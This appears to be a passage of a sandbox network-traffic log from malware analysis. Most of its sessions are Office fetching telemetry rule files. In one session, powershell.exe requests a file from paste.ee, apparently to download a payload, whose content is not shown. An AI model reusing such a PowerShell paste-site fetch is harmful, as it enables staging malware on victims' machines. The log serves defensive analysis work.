                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                6 | 192.168.2.5 | 49714 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:51 UTC | 192 | OUT | GET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 450
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                x-ms-request-id: b9d87bc4-001e-008d-138c-15d91e000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55whfstvfw43u8fp40000000cb000000000b9n3
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                7 | 192.168.2.5 | 49716 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:51 UTC | 192 | OUT | GET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 408
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                x-ms-request-id: 4b0a31e7-c01e-00ad-448c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55rg5b7sh1vuv8t7n0000000cs0000000001wh9
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.2.5 | 49718 | 188.114.97.3 | 443 | 7136 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:51 UTC | 67 | OUT | GET /d/XlUYO/0 HTTP/1.1
                                                                                Host: paste.ee
                                                                                Connection: Keep-Alive
                                                                                2024-10-04 09:33:52 UTC | 1204 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: max-age=2592000
                                                                                strict-transport-security: max-age=63072000
                                                                                x-frame-options: DENY
                                                                                x-content-type-options: nosniff
                                                                                x-xss-protection: 1; mode=block
                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTjg6cU4lVSWz9sxVpGQoQASrFCLbzc5FGi90LpozrdO2VQzJVECfm0x3mG%2B0dfjR%2BxsE40zCFWIIHW36IwYXvAKztry5V89EV5ktZjNmPcav3tKQkF2me%2Fzww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8cd42c3f1f1f4245-EWR


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                9 | 192.168.2.5 | 49721 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:52 UTC | 192 | OUT | GET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 474
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                ETag: "0x8DC582B9964B277"
                                                                                x-ms-request-id: aa8826a4-b01e-0053-608c-15cdf8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc552g4w83buhsr3htc0000000c8000000000a66g
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                10          192.168.2.5  49719        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:52 UTC  192                OUT        GET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                x-ms-request-id: 757ce4f4-401e-000a-128c-154a7b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55rv8zjq9dg0musxg0000000cag000000005myu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC  415                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                11          192.168.2.5  49720        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:52 UTC  192                OUT        GET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 471
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                ETag: "0x8DC582BB10C598B"
                                                                                x-ms-request-id: 24b39cfc-301e-0096-2a8c-15e71d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55rv8zjq9dg0musxg0000000c90000000008dzh
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC  471                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                12          192.168.2.5  49723        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:52 UTC  192                OUT        GET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 632
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                x-ms-request-id: 3a0dc1eb-601e-0032-608c-15eebb000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55n4msds84xh4z67w00000005xg00000000ae9r
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC  632                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                13          192.168.2.5  49722        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:52 UTC  192                OUT        GET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 467
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                x-ms-request-id: b2393cc3-501e-005b-768c-15d7f7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55whfstvfw43u8fp40000000cdg000000007t85
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC  467                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                14          192.168.2.5  49725        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:52 UTC  192                OUT        GET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 407
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                x-ms-request-id: 023e3708-a01e-003d-568c-1598d7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55qdcd62bsn50hd6s0000000c0000000000bn6b
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  407                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                15          192.168.2.5  49728        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:52 UTC  192                OUT        GET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 486
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                ETag: "0x8DC582B9018290B"
                                                                                x-ms-request-id: e0871f45-901e-00a0-0d8c-156a6d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55472x4k7dmphmadg0000000bx0000000009fh0
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  486                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                16          192.168.2.5  49726        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:52 UTC  192                OUT        GET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 486
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                ETag: "0x8DC582BB344914B"
                                                                                x-ms-request-id: 1cc301c6-e01e-0071-6b8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55whfstvfw43u8fp40000000ck0000000000wr7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  486                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                17          192.168.2.5  49727        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:53 UTC  192                OUT        GET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                ETag: "0x8DC582BA310DA18"
                                                                                x-ms-request-id: 1cc301ca-e01e-0071-6f8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55v7j95gq2uzq37a00000000ck00000000057wq
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  427                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                18          192.168.2.5  49729        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:53 UTC  192                OUT        GET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 407
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                ETag: "0x8DC582B9698189B"
                                                                                x-ms-request-id: 023e3944-a01e-003d-708c-1598d7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55rv8zjq9dg0musxg0000000c90000000008e03
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  407                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                19          192.168.2.5  55397        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:53 UTC  192                OUT        GET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 469
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                ETag: "0x8DC582BBA701121"
                                                                                x-ms-request-id: a68dfe67-f01e-0052-588c-159224000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55xsgnlxyxy40f4m00000000c5g00000000905t
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  469                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                20          192.168.2.5  55400        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:53 UTC  192                OUT        GET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 494
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                ETag: "0x8DC582BB7010D66"
                                                                                x-ms-request-id: 79ade187-001e-0065-788c-150b73000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55472x4k7dmphmadg0000000c0g000000005tvd
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  494                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                21          192.168.2.5  55398        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:53 UTC  192                OUT        GET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                ETag: "0x8DC582BA41997E3"
                                                                                x-ms-request-id: c54fb296-901e-008f-528c-1567a6000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc5546rn6ch9zv310e000000005a0000000005hzz
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  415                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                22          192.168.2.5  55401        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:53 UTC  192                OUT        GET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 477
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                ETag: "0x8DC582BB8CEAC16"
